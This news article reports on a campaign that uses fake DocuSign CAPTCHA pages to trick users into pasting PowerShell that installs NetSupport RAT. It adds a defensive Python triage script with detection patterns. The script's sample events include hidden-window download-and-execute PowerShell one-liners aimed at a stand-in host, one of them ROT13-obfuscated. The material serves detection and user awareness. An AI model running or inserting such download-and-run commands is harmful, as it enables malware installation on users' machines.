Fake Docusign Pages Deliver Multi-Stage NetSupport RAT Malware


A new malware campaign using fake DocuSign verification pages to deploy the NetSupport Remote Access Trojan (RAT) has been uncovered.

According to DomainTools, the campaign tricks users into infecting their own machines through a series of deceptive steps involving clipboard manipulation and disguised scripts.

At the core of the campaign is a spoofed DocuSign website that mimics a CAPTCHA verification screen. When the user ticks the "verify" checkbox, the page's click handler silently writes a malicious PowerShell one-liner to the clipboard (clipboard poisoning), then shows on-screen instructions to open the Windows Run prompt (Win+R), paste (Ctrl+V) and press Enter. Nothing exploits the browser; the victim types the attacker's command themselves, the social-engineering pattern widely tracked as ClickFix.

Once executed, the pasted script downloads a second-stage payload, which sets up persistence on the victim's machine by fetching an executable from GitHub and placing a shortcut to it in the Startup folder, so it relaunches at every logon.

The final stage delivers NetSupport RAT, allowing the attacker to maintain remote access.


The initial script and site obfuscate their intent using ROT13 encoding and blend Cloudflare and DocuSign branding to appear legitimate. ROT13 is a fixed letter substitution and its own inverse, so it offers no secrecy; its only job is to keep strings such as the download URL and the invoke-expression call out of plain-text pattern matching until runtime.

Meanwhile, the attack's architecture is deliberately staged to get past security defenses: each script is a small downloader for the next, so no single artifact (the clipboard command, the first script, the GitHub-hosted executable) contains the full chain, and each stage can be swapped out independently when it gets detected.
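The chain described above (explorer.exe launching a hidden PowerShell from the Run box, ROT13-wrapped download commands, a shortcut dropped into the Startup folder) leaves a recognisable trail in ordinary endpoint telemetry. The following is an added example, not code from DomainTools or from this article: a small Python triage script run over constructed Sysmon-style records. The records are hand-written for the example, not captured from a real host; the field names follow Sysmon Event ID 1 (process create) and Event ID 11 (file create) conventions, and the URL, paths, file names and the ROT13 payload are invented for illustration.

```python
import codecs
import re
from typing import Dict, List

# Script hosts a pasted Win+R command typically lands in, and the parent the
# Run box launches them from (the Run dialog is part of explorer.exe).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}
# Per-user Startup folder, the shortcut drop location the article describes.
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"

# Command-line indicators. Names are sorted into the findings so output is stable.
PAYLOAD_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download-cmdlet": re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|net\.webclient", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so decoding is the same operation as encoding."""
    return codecs.decode(text, "rot_13")


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze_process_create(ev: dict) -> List[str]:
    findings: List[str] = []
    if _basename(ev["Image"]) in SCRIPT_HOSTS and _basename(ev["ParentImage"]) in INTERACTIVE_PARENTS:
        findings.append("script-host-from-explorer")
    cmd = ev["CommandLine"]
    clear_hits = {name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(cmd)}
    findings.extend(sorted(clear_hits))
    # Second pass over the ROT13-decoded command line: anything that matches only
    # after decoding was hidden by exactly the substitution the campaign uses.
    rot_hits = {name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(rot13(cmd))} - clear_hits
    findings.extend("rot13:" + name for name in sorted(rot_hits))
    return findings


def analyze_file_create(ev: dict) -> List[str]:
    target = ev["TargetFilename"].lower()
    if STARTUP_DIR in target and target.endswith((".lnk", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".exe")):
        return ["startup-folder-persistence"]
    return []


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map event index -> findings, for events that produced at least one finding."""
    report: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        if ev["EventType"] == "ProcessCreate":
            found = analyze_process_create(ev)
        elif ev["EventType"] == "FileCreate":
            found = analyze_file_create(ev)
        else:
            found = []
        if found:
            report[i] = found
    return report


# Constructed sample records (hypothetical; example.invalid is a reserved test domain).
SAMPLE_EVENTS = [
    # 0: plain ClickFix paste, download command in clear text
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://example.invalid/verify' -UseBasicParsing)\""},
    # 1: same chain, but the download command is ROT13-encoded and decoded at runtime
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": ("powershell -w hidden -c \"$s='vrk(vje uggc://rknzcyr.vainyvq/irevsl -HfrOnfvpCnefvat)';"
                     "$d=-join($s.ToCharArray()|%{$c=[int]$_;if($c-ge65-and$c-le90){[char](($c-52)%26+65)}"
                     "elseif($c-ge97-and$c-le122){[char](($c-84)%26+97)}else{$_}});&([scriptblock]::Create($d))\"")},
    # 2: benign developer activity, should produce no findings
    {"EventType": "ProcessCreate",
     "Image": r"C:\Users\alice\AppData\Local\Programs\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r"pwsh -NoProfile -File .\build.ps1"},
    # 3: second stage dropping its shortcut into the Startup folder
    {"EventType": "FileCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk"},
    # 4: ordinary file write, should produce no findings
    {"EventType": "FileCreate",
     "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, _basename(SAMPLE_EVENTS[idx]["Image"]), hits)
```

The parent/child rule is the cheap, high-signal part: a console script host whose parent is explorer.exe with a hidden window and a URL on its command line is almost never legitimate on a user workstation. The second pass shows why ROT13 buys the attacker so little against anyone who normalises before matching; the same loop would cover Base64 (`-EncodedCommand`) or other reversible wrappers. Note that the Run prompt also keeps a per-user history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is useful during incident response to recover exactly what the victim pasted.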

Expanding Infrastructure and Spoofed Platforms

The DomainTools investigation also revealed a broader infrastructure supporting this campaign. Domains mimicking Gitcodes, Okta and popular media apps like Netflix and Spotify were identified.

The same techniques (CAPTCHA spoofing, script chaining and clipboard attacks) were found across these spoofed platforms.

Several domains shared common traits, including:

  • Registration via Cloudflare, NameCheap and NameSilo

  • Name servers linked to cloudflare[.]com and luxhost[.]org

  • TLS certificates issued by WE1 (a Google Trust Services intermediate that Cloudflare-fronted sites commonly use, so on its own this is a pivoting attribute, not a sign of malice)

  • Malware hosted on GitHub and Discord content delivery networks

Despite the sophistication of the attack, the tools used are familiar.

These include NetSupport Manager, a legitimate remote administration tool that is frequently repurposed in cyber-attacks; because it is signed commercial software, its presence is not malicious in itself and has to be judged by how it arrived. Similar techniques have been used by groups such as FIN7 and Storm-0408, though attribution remains unclear.

Security Recommendations and Takeaways

DomainTools urged users to stay alert, especially when prompted to run PowerShell scripts by unfamiliar websites. No legitimate site should ask users to paste commands into the Windows Run prompt under the pretense of verification, and a CAPTCHA page whose "verification" involves running anything outside the browser is a clear warning sign.

Users should closely inspect URLs, watching for subtle misspellings and strange domain extensions. Certificate inspection helps less than it once did: the spoofed domains in this campaign carried valid certificates from the same issuer that many legitimate Cloudflare-fronted sites use, so the domain name, not the padlock, is what to check.

Ultimately, DomainTools emphasized that these attacks rely more on user deception than technical flaws. Staying skeptical and verifying legitimacy before acting remains one of the strongest defenses, and organizations can back that up by alerting on script hosts launched from explorer.exe and on new shortcuts appearing in Startup folders.

Image credit: Tada Images / Shutterstock.com


